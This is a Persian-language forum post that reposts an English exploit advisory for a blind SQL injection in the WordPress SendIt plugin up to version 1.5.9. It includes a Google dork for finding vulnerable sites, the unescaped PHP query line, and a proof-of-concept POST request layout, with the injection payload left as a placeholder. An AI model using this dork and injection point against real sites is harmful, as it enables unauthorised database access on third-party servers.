نمایش نتایج: از شماره 1 تا 1 , از مجموع 1

موضوع: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

Hybrid View

پست قبلی پست قبلی   پست بعدی پست بعدی
  1. #1
    موسس و مدیر
    نمی‌دانم در کدامین کوچه جستجویت کنم ؟ آسوده بخواب مادر بیمارم
    تاریخ عضویت
    Feb 2010
    محل سکونت
    13 78 57
    نوشته ها
    13,577
    تشکر تشکر کرده 
    15,753
    تشکر تشکر شده 
    17,227
    تشکر شده در
    4,905 پست
    حالت من : Khoonsard
    قدرت امتیاز دهی
    24982
    Array

    WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

    # Exploit Title: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability# Google Dork: inurl:"wp-content/plugins/sendit/submit.php"
    # Date: 2011-08-25
    # Author: evilsocket ( evilsocket [at] gmail [dot] com )
    # Software Link: http://wordpress.org/extend/plugins/sendit/
    # Version: 1.5.9 (tested with magic quotes OFF)


    ---------------
    Vulnerable code
    ---------------

    [ submit.php line 27 ]

    $user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST
    [lista]';");


    As you can see, $_POST
    [lista] parameter is nor validated neither escaped, so you can blind sql inject it using $user_count for the
    boolean condition checking :


    [ submit.php line 29 ]

    if($user_count>0) :
    $errore_presente = "<div class=\"error\">".__('email address already present', 'sendit')."</div>";
    die($errore_presente);

    ---
    PoC
    ---

    POST:

    email_add = some.random.regexp.valid.email@domain.ltd
    lista = BLIND SQL INJECTION HERE

    TO:

    http://www.site.com/wp-content/plugins/sendit/submit.php
    زندگی در بردگی شرمندگی است * معنی آزاد بودن زندگی است
    سر که خم گردد به پای دیگران * بر تن مردان بود بار گران




  2. کاربر مقابل از Mohamad عزیز به خاطر این پست مفید تشکر کرده است:


برچسب ها برای این تاپیک

علاقه مندی ها (بوک مارک ها)

علاقه مندی ها (بوک مارک ها)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  

http://www.worldup.ir/